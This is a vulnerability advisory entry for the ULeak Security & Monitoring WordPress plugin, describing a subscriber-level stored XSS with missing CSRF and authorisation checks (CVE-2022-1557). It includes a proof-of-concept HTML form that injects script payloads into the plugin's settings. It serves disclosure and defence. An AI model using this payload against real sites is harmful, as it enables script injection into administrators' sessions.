WordPress Plugin Vulnerabilities

ULeak Security & Monitoring <= 1.2.3 - Subscriber+ Stored Cross-Site Scripting

Description

The plugin does not have authorisation and CSRF checks when updating its settings, and is also lacking sanitisation as well as escaping in some of them, which could allow any authenticated users such as subscriber to perform Stored Cross-Site Scripting attacks against admins viewing the settings

Proof of Concept

As any authenticated user:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-post.php" method="POST">
      <input type="hidden" name="action" value="add_apikey" />
      <input type="hidden" name="ul_username" value='"><script>alert(/XSS1/)</script>' />
      <input type="hidden" name="ul_passwort" value="" />
      <input type="hidden" name="ul_apikey" value='"><script>alert(/XSS2/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
uleak-security-dashboard
No known fix

References

CVE
CVE-2022-1557
URL
https://packetstormsecurity.com/files/#166564/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.0 (high)

Miscellaneous

Original Researcher
Hassan Khan Yusufzai - Splint3r7
Verified
Yes
WPVDB ID
e2b6dbf5-8709-4a2c-90be-3214ff55ed56

Timeline

Publicly Published
2022-04-02 (about 2 years ago)
Added
2022-04-02 (about 2 years ago)
Last Updated
2022-05-04 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
All-in-One Event Calendar 1.9 - wp-admin/post-new.php Multiple Parameter XSS
Published
2023-11-08
Title
Post Pay Counter < 2.790 - Reflected XSS
Published
2015-04-21
Title
WordPress <= 4.1.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
Published
2021-11-23
Title
IDPay for Contact Form 7 <= 2.1.2 - Reflected Cross-Site Scripting
Published
2023-01-17
Title
WP-CommentNavi < 1.12.2 - Admin+ Stored XSS